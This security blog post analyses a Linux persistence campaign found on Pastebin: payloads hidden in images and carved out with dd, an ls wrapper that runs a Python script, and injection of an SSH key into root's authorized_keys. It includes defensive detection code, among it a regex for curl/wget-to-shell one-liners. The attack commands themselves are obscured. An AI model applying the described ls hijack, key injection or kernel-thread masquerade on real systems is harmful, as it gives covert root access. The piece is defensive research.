A Pastebin scraper, steganography, and a persistent Linux backdoor

One great thing about working in information security is that there is no normal. We routinely encounter strange and novel things, and that’s exactly what turned up after some roving on Pastebin over the last few weeks.

As a bit of context, it’s pretty routine for adversaries to host shells, executables, and other attack infrastructure on Pastebin. If you scrape the site for the right indicators or patterns, then you’re bound to find something. Of course, a lot of the attack tooling on Pastebin is pretty mundane, but sometimes—if you’re willing to examine a long and convoluted sequence of scripts—you can find a persistent Linux backdoor concealing itself with steganography.

Let’s start at the beginning

I ran some Pastebin searches for evidence of a classic shell trick—where adversaries use curl or wget to download and execute a later-stage payload—and they yielded seemingly negligible results:

However, since it would only take a minute to see if the download was available, it made sense to check. Of course, it was available, and what followed was ultimately fascinating.
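For readers curious about the scraping side, here is a minimal sketch of the kind of pattern matching involved. It assumes pastes have already been fetched as plain text (the scraper itself isn't described here), and both the function name and the regular expression are hypothetical. It only catches the piped form (curl or wget output fed straight into a shell), not variants such as bash -c "$(curl ...)".

```python
from __future__ import annotations

import re

# Hypothetical pattern: curl or wget on a line, followed (with no ';' in between)
# by a pipe into a shell interpreter (sh, bash, dash, or zsh), optionally via sudo.
# The trailing \b keeps commands like "| shasum" from matching.
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^\n|;]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b")


def find_download_exec(paste_text: str) -> list[str]:
    """Return each line of a paste that looks like a download-and-execute one-liner."""
    return [
        line.strip()
        for line in paste_text.splitlines()
        if DOWNLOAD_EXEC.search(line)
    ]
```

Run over a paste containing "curl -fsSL https://pastebin.com/raw/XXXXXXXX | bash", it returns that line, while a plain "curl https://example.com -o file.txt" is ignored.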

Here’s what turned up

Take a look at line 12:

While not a completely new idea, it’s certainly unusual to see this use of the Unix dd command. Normally, dd is used to copy and convert data. Security professionals will often encounter it when making forensic disk copies and overwriting data. In this case, it looked like they were using dd with the skip option to extract an executable from an image, suggesting that this wasn’t your everyday bash shell malware.
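The exact dd invocation is obscured here, but the idea is easy to reproduce for analysis. dd's skip operand skips that many input blocks of bs bytes, so copying starts at byte offset skip * bs (with bs=1, skip=N simply means "start at byte N"). The following sketch mirrors that slicing in Python and, when the offset is unknown, searches the image for the ELF magic bytes (\x7fELF). The function names are hypothetical, and a magic-byte search can hit by coincidence in arbitrary image data, so treat a match as a lead rather than proof.

```python
from __future__ import annotations

ELF_MAGIC = b"\x7fELF"


def dd_slice(data: bytes, skip: int, bs: int = 1, count: int | None = None) -> bytes:
    """Return what `dd bs=<bs> skip=<skip> [count=<count>]` would copy from data.

    dd skips `skip` input blocks of `bs` bytes, so copying starts at byte
    offset skip * bs and, if count is given, stops after count blocks.
    """
    start = skip * bs
    end = None if count is None else start + count * bs
    return data[start:end]


def find_embedded_elf(data: bytes) -> int:
    """Offset of the first ELF magic number in data, or -1 if there is none."""
    return data.find(ELF_MAGIC)


def carve_file(image_path: str, out_path: str, skip: int, bs: int = 1) -> int:
    """Write the carved bytes to out_path (nothing is executed); return the byte count."""
    with open(image_path, "rb") as src:
        payload = dd_slice(src.read(), skip, bs)
    with open(out_path, "wb") as dst:
        dst.write(payload)
    return len(payload)
```

Inside an analysis VM, carve_file("suspect.png", "carved.bin", skip=offset), with the offset taken from the script or from find_embedded_elf(), reproduces the extraction without running the payload.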

Now we follow the breadcrumbs

Luckily, the website hosting the image hadn't been taken down, and I was able to retrieve it (see below). Better yet, the image was still concealing the executable, and a Google search for the image turned up no matches.

The dd command worked as expected and extracted an executable program named rcu_bh. Running the file command on it showed that the extracted program was an Executable and Linkable Format (ELF) binary, which is essentially the Linux counterpart to the Windows Portable Executable (PE) format.
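The file command identifies binaries from their headers. As a rough illustration (file itself works from a magic database, not code like this), the first 20 bytes of an ELF header are enough to recover the word size, byte order, object type, and target architecture. Field offsets follow the ELF specification; the lookup tables below are deliberately incomplete.

```python
import struct

# Partial lookup tables; values come from the ELF specification.
ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core file"}
ELF_MACHINES = {0x03: "Intel 80386", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "ARM aarch64"}


def describe_elf(header: bytes) -> str:
    """Summarize an ELF header in the spirit of the `file` command."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # e_ident[EI_CLASS] (index 4): 1 = 32-bit, 2 = 64-bit.
    bits = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown-class")
    # e_ident[EI_DATA] (index 5): 1 = little-endian, 2 = big-endian.
    order = {1: ("<", "LSB"), 2: (">", "MSB")}.get(header[5])
    if order is None:
        raise ValueError("unknown ELF data encoding")
    # e_type and e_machine are 2-byte fields right after the 16-byte e_ident,
    # at the same offsets in 32- and 64-bit files.
    e_type, e_machine = struct.unpack_from(order[0] + "HH", header, 16)
    # PIE executables use type 3 (ET_DYN); newer `file` versions report them as
    # "pie executable", a distinction this sketch does not make.
    kind = ELF_TYPES.get(e_type, hex(e_type))
    arch = ELF_MACHINES.get(e_machine, hex(e_machine))
    return f"ELF {bits} {order[1]} {kind}, {arch}"
```

Usage is a one-liner: open the carved file in binary mode and pass the first 64 bytes to describe_elf().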

At the time, no one had previously uploaded the file to VirusTotal, and once it was submitted, zero out of 59 anti-malware engines flagged it as malicious. As of this writing, it has the same score. VirusTotal did note that it issues a curl command to Pastebin, but nothing else. The Hybrid-Analysis sandbox also failed to find anything interesting about the file, determining that it posed “No Specific Threat.”

Beyond sandboxes and malware repositories

At this point, regular text-based analysis was going nowhere, and VirusTotal and Hybrid-Analysis failed to report back the presence of any malicious activity. The logical next step was to carry out a deeper analysis by executing the binary in an isolated and instrumented virtual machine, which ultimately revealed its purpose: to download and execute another script from Pastebin.

This follow-on script executed a command that was identical to the first command shown in this report, only with a different target URL on Pastebin.

What’s going on at this URL?

Let’s break this down a bit, because there’s some interesting stuff going on here. First, the script ensures that the /tmp directory exists (see line four), suggesting that the attack requires root-level access, since root privileges are typically required to create a directory in /. Then, starting at line seven, it checks for the presence of an unusual file that wouldn’t normally show up on a Linux system: lsx. If that program is already on the system, the attackers run it and exit.

However, if lsx isn’t already installed on the system, the attackers carry out the following actions:

Try to install git
Try to install gcc (the compiler for C)
Download another, different image (from the same location as before)
Extract a program from the image via dd and execute it (same as before)
Run lsx (which suggests that lsx is supposed to be installed by the program that is run in step four)
Clean up and exit.

But wait, there’s more!

The second image looked identical to the first, and the program it concealed (rcu_gp) was a 64-bit ELF executable. Yet again, zero antivirus vendors flagged it as malicious on VirusTotal, and the behavioral analysis report showed some git-related activity but nothing significant beyond that. So once more, we needed to execute the program in a controlled environment. This time, instead of fetching another script from Pastebin or extracting a program from an image, it used git to clone a code repository and executed a script from the resulting directory tree. Specifically, it executed the following command:

Well, now we know why the previous script was trying to install git. Here we see init.sh, which performs a variety of functions that we’re about to break down.

First, it locates the ls program, then it invokes a new Python script (cpl.py) with that location. Most of the Python script’s contents are dead code or Chinese-language notes, so we only need to examine a few pieces of it:

This routine takes the ls command located by the init.sh script and renames it to ls. (note that the trailing period is part of the file’s new name).

It also creates a file in /etc named systs.conf, a perfectly plausible name for a file in /etc but not a legitimate configuration file. Next, the program writes a dictionary (serialized as JSON) containing a number and a date to that file.

Here we can see where cpl.py executes those two routines.

However, there’s another part of init.sh we need to look at:

Now the ls command is being replaced by the following shell script: ls.sh. Naturally, we need to see what ls.sh does.

So ls was replaced by a shell script that invokes the original ls (remember: cpl.py renamed ls to ls.). The script also passes ls. every argument it received ("$@" expands to all of the arguments the script was invoked with). After running the original ls (aka ls.), the script runs another program named lsx. In other words, the user gets exactly the output they expect from the real ls utility; the unexpected part is the extra execution of lsx.
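Because the wrapper leaves such distinctive traces, a quick read-only triage check is straightforward. This is a minimal sketch that assumes the names seen in this campaign (ls. and lsx) and that the wrapper sits where ls used to be; another campaign could use different names or locations. The logic is split into a pure function and a small filesystem wrapper so it can be tested without touching a live system.

```python
from __future__ import annotations

import os
import shutil

# File names observed in this campaign; other campaigns could use different ones.
SUSPICIOUS_SIBLINGS = ("ls.", "lsx")


def classify_ls(header: bytes, siblings: set[str]) -> list[str]:
    """Flag signs of the ls wrapper from the first bytes of ls and its directory listing."""
    findings = []
    if header.startswith(b"#!"):
        findings.append("ls is a script, not a compiled binary")
    elif not header.startswith(b"\x7fELF"):
        findings.append("ls is not an ELF binary")
    findings += [
        f"unexpected file {name!r} next to ls"
        for name in SUSPICIOUS_SIBLINGS
        if name in siblings
    ]
    return findings


def inspect_ls(ls_path: str | None = None) -> list[str]:
    """Gather inputs for classify_ls() from the live filesystem (read-only)."""
    ls_path = ls_path or shutil.which("ls")
    if ls_path is None:
        return ["ls not found on PATH"]
    with open(ls_path, "rb") as f:
        header = f.read(4)
    return classify_ls(header, set(os.listdir(os.path.dirname(ls_path))))
```

On a clean system, inspect_ls() should return an empty list; any finding is worth a closer look.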

The plot thickens

The following piece of init.sh is the next important thing we need to examine:

And now we know why gcc was installed earlier. The init.sh script compiles the C program x.c into an executable named lsx. Then lsx is copied to the directory where ls lives, which lets the ls.sh wrapper (now standing in for the ls command) run lsx after running the real ls (which had been renamed to ls.).

Let’s look at the x.c program:

In essence, lsx invokes a Python program named key, and this brings us back to init.sh for one last important detail:

This merely installs key.py, along with some auxiliary Python code, into the system Python library. Because it lives in the syskey directory, the easiest way to refer to key.py is as a submodule of the syskey package (that is, syskey.key, as we saw in the x.c program).
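On a suspect host, an analyst may want to know whether a syskey package is importable without actually running it. Here is a minimal sketch using importlib.util.find_spec(): for a top-level name, find_spec() locates the module without executing it. Resolving a dotted name such as syskey.key would import the parent package first (running its code), so the helper refuses dotted names. Run it with the same interpreter lsx would invoke, since each Python installation has its own library path; the helper name is hypothetical.

```python
from __future__ import annotations

import importlib.util


def find_package_dirs(name: str) -> list[str]:
    """Return where a top-level module or package `name` would be imported from.

    find_spec() on a top-level name locates the module without executing it.
    Dotted names are refused because resolving "syskey.key" would import (and
    therefore run) the parent package "syskey" first.
    """
    if "." in name:
        raise ValueError("pass a top-level name only, e.g. 'syskey'")
    spec = importlib.util.find_spec(name)
    if spec is None:
        return []
    if spec.submodule_search_locations:  # a package: report its directories
        return list(spec.submodule_search_locations)
    return [spec.origin] if spec.origin else []
```

A non-empty result for find_package_dirs("syskey") points straight at the directory to examine.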

This seems like a lot of effort for someone who is simply trying to run key.py every time ls runs.

Making it worth the wait

VirusTotal had not seen key.py before, and zero of 58 antivirus engines are currently alerting on it.

We’ll examine key.py in reorganized pieces in order to clearly explain what it’s up to.

Well, now we’re getting an idea of what the /etc/systs.conf file is for. The variable ts receives the start date stored in that file, represented as the number of seconds since the epoch, and time.time() returns the current time in the same units. In the if block, we can see that if the current date is before the start time stored in /etc/systs.conf, this function simply returns without doing anything. Otherwise, the variable latency_time is set to the delay value stored in /etc/systs.conf, and execution continues.

In the sample I have, that start date is 2018-01-01, so the program is currently free to run. This could serve to prevent execution prior to some start date. It could also function as a type of kill switch, by specifying a date far in the future.
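To check whether a systs.conf found on a host is "armed," the date gate can be re-created in a few lines. This sketch assumes the file holds JSON keys named start (a YYYY-MM-DD date, like the 2018-01-01 in this sample) and delay (seconds). The key names follow the description above, but the exact formats, including the 3600-second delay used when testing, are assumptions. It also reads the date as UTC midnight, whereas the original code may use local time.

```python
from __future__ import annotations

import json
import time
from datetime import datetime, timezone


def gate_status(conf_text: str, now: float | None = None) -> tuple[bool, float]:
    """Return (past_start_date, latency_seconds) for a systs.conf-style JSON blob.

    Assumed layout: {"start": "YYYY-MM-DD", "delay": <seconds>}. The start date
    is read as UTC midnight; the original code may use local time instead.
    """
    conf = json.loads(conf_text)
    start = datetime.strptime(conf["start"], "%Y-%m-%d").replace(tzinfo=timezone.utc)
    now = time.time() if now is None else now
    # Mirrors the described check: before the start date, key.py returns early.
    return now >= start.timestamp(), float(conf["delay"])
```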

Here’s the other piece of the latency_time mechanism:

This routine (is_running) uses the file /tmp/sys.ts to track the last time this program ran. If the program ran less than latency_time seconds ago, the routine returns True. Otherwise, it writes the current time (in seconds since the epoch) to that file and returns False. key.py uses this as a throttle: when is_running returns True, key.py aborts, so its payload runs at most once every latency_time seconds.
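The throttle is simple enough to restate as code. This is a sketch of the behavior described above, not the malware's source: the stamp file's format (a plain number of seconds) is an assumption, and the path and clock are parameters so the logic can be exercised safely on a scratch file.

```python
from __future__ import annotations

import time


def is_running(stamp_path: str, latency_time: float, now: float | None = None) -> bool:
    """Sketch of the described throttle: True means "ran too recently, abort".

    Reads the last-run time from stamp_path; if that was less than latency_time
    seconds before `now`, returns True without touching the file. Otherwise it
    records `now` and returns False. The plain-number file format is assumed.
    """
    now = time.time() if now is None else now
    try:
        with open(stamp_path) as f:
            last = float(f.read().strip())
        if now - last < latency_time:
            return True
    except (OSError, ValueError):
        pass  # missing or malformed stamp: treat as "never ran"
    with open(stamp_path, "w") as f:
        f.write(repr(now))
    return False
```

One practical consequence for responders: because the stamp is only rewritten when the check passes, the value in /tmp/sys.ts reflects the last time key.py got past this throttle.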

As you can see, there’s more going on in check():

This is interesting because an SSH public key is stored in the variable b.

In the above image, you can see the public key being added to the root account’s authorized_keys file, along with a step that ensures SSH is running. At this point, anybody holding the corresponding SSH private key can log in to the root account over SSH.

Finally, it’s clear what all this effort was for: persistent, root-level access. Every time root runs the ‘ls’ command on this computer, ‘key.py’ also runs as root and reinstalls the backdoor on the root account.
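Since the backdoor boils down to a single added key in the root account's authorized_keys file, auditing that file against a list of expected keys is a cheap defense. The sketch below computes OpenSSH-style SHA256 fingerprints (the same format ssh-keygen -lf prints) and reports any key that isn't on an allowlist you maintain. The function names are hypothetical, and the simple whitespace split won't cope with option strings that contain quoted spaces.

```python
from __future__ import annotations

import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def fingerprint(key_line: str) -> str | None:
    """OpenSSH-style SHA256 fingerprint of one authorized_keys line, or None.

    Skips leading options (e.g. from="...") by looking for the key-type field;
    options containing quoted spaces are not handled.
    """
    fields = key_line.split()
    for i, field in enumerate(fields[:-1]):
        if field.startswith(KEY_TYPE_PREFIXES):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None


def unexpected_keys(authorized_keys_text: str, allowed: set[str]) -> list[str]:
    """List fingerprints (or unparseable lines) not present in the allowlist."""
    findings = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fp = fingerprint(line)
        if fp is None:
            findings.append("unparseable: " + line[:40])
        elif fp not in allowed:
            findings.append(fp)
    return findings
```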

But wait again… there’s still more!

After the string in url is decoded and decompressed, the variable u contains the following string:

The platform.platform() call returns a string identifying the underlying platform, such as the operating system, its release, and the machine architecture.

All of this means that after u.strip('www.qq.com') runs, the program connects to a web server whose name has been compressed, base64-encoded, and embedded among distractor hostnames. Besides revealing the victim’s IP address simply by connecting, it uploads details about the operating system running on the computer that just had a root backdoor installed.
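Two details here are worth making concrete. First, reversing the obfuscation means base64-decoding and then decompressing; the sketch assumes zlib, since the compression format isn't stated. Second, Python's str.strip() treats its argument as a set of characters, not a substring, so u.strip('www.qq.com') trims any leading or trailing w, ., q, c, o, or m characters. The hostnames below are made-up examples, not the attacker's server.

```python
import base64
import zlib


def decode_blob(encoded: str) -> str:
    """Undo compress-then-base64 obfuscation (zlib is an assumption)."""
    return zlib.decompress(base64.b64decode(encoded)).decode()


def unwrap_host(decoded: str, distractor: str = "www.qq.com") -> str:
    """Mirror the u.strip('www.qq.com') call.

    str.strip() removes any run of the characters w . q c o m from both ends;
    it does not remove the literal substring "www.qq.com".
    """
    return decoded.strip(distractor)


# Hypothetical inputs showing the character-set behavior:
#   unwrap_host("www.qq.com.evil.example")    -> "evil.example"
#   unwrap_host("www.qq.commail.example.com") -> "ail.example"
```

The second example shows the side effect: the leading m of "mail" and the trailing ".com" are eaten too, which matters when reproducing the decoding by hand.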

Tying up the loose ends

The routine check() does the bulk of the work for key.py. When check() runs to completion, the following are true:

The root account’s authorized_keys file contains the attacker’s key, giving the attacker root access via SSH
SSH is running
A connection has been made to the attacker’s website, notifying them that this machine has the backdoor installed and which operating system it is running

Alternatively, the latency_time check might have failed, meaning that the machine is already compromised, and it’s too soon to run this program again. It’s also possible that the current date is before the start time, which would prevent the program from running altogether.

In summary

It’s easy to get lost in this admittedly convoluted maze of scripts, so here’s the high level version:

An already compromised machine downloads and executes a one-line script from Pastebin
That one-line script downloads and executes a more complex script from Pastebin
The more complex script downloads a .png file from a Chinese host, extracts a hidden executable (rcu_bh), and runs it
rcu_bh downloads and executes yet another one-line script from Pastebin
Again, the one-line script downloads and executes a more complex script from Pastebin
The more complex script downloads a different .png, extracts another hidden executable (rcu_gp), and runs it
rcu_gp performs a git clone from a Chinese site, effectively downloading a directory tree, and executes a bash script (init.sh) in that downloaded directory tree
The bash script then coordinates the replacement of the standard Unix ls command with a script that will run the original ls command, before running a malicious Python script named key.py. It also installs a file in /etc, which controls when and how often this malware will run.
The malicious Python script (key.py) modifies the root account’s authorized_keys file, effectively providing a backdoor to the root account via SSH. It also contacts a remote server, notifying it that the backdoor has been successfully installed on the local machine and reporting which operating system the machine is running.

Closing Thoughts

Attempts to connect to the web server in the post_info() routine returned an HTTP “500 Internal Server Error.” Further, while the program was running, no subsequent SSH connections attempted to access the root account. This could mean that the server has already been taken down, or perhaps it has not entered production yet.

This tooling is all about establishing persistence on an already compromised machine. It requires root access to run. Once an attacker has root, downloading and running the initial script is trivial. The names of the two executable programs, rcu_bh and rcu_gp, match the names of standard Linux kernel threads, which is pretty clearly an attempt at defense evasion.
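The borrowed kernel-thread names also suggest a simple hunting heuristic. Genuine kernel threads have no userspace executable, so reading the /proc/&lt;pid&gt;/exe link fails for them, while a userland program borrowing the name has a readable link. This sketch flags such processes. It needs root to read other users' exe links, and it checks argv[0] as well as comm on the assumption that a program built with a shell-script compiler may re-exec a shell and keep the borrowed name only in its command line. Treat it as one signal among several; the function and constant names are hypothetical.

```python
from __future__ import annotations

import os

# Kernel-thread names borrowed by this campaign's executables.
KTHREAD_LOOKALIKES = frozenset({"rcu_bh", "rcu_gp"})


def _read(path: str) -> bytes:
    with open(path, "rb") as f:
        return f.read()


def masquerading_processes(
    proc: str = "/proc", names: frozenset[str] = KTHREAD_LOOKALIKES
) -> list[tuple[int, str, str]]:
    """Find processes named like a kernel thread that nonetheless have an executable.

    readlink() on /proc/<pid>/exe fails with ENOENT for real kernel threads, so
    a readable link means a userland program is borrowing the name. Without
    root, other users' exe links raise PermissionError and are skipped.
    """
    hits = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            comm = _read(os.path.join(base, "comm")).decode(errors="replace").strip()
            cmdline = _read(os.path.join(base, "cmdline"))
            argv0 = cmdline.split(b"\0")[0].decode(errors="replace")
            if comm not in names and os.path.basename(argv0) not in names:
                continue
            exe = os.readlink(os.path.join(base, "exe"))
        except (FileNotFoundError, PermissionError, ProcessLookupError):
            continue  # kernel thread, exited process, or insufficient privilege
        hits.append((int(entry), comm, exe))
    return hits
```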

I’ve obscured many of the details here since all the links are still live and dangerous. It appears likely that the shc shell script compiler was used to generate the two executables. This conclusion is based on some of the dead code in the scripts, files found in the downloaded git repository, and the behavior of the two executables.

Del Armstrong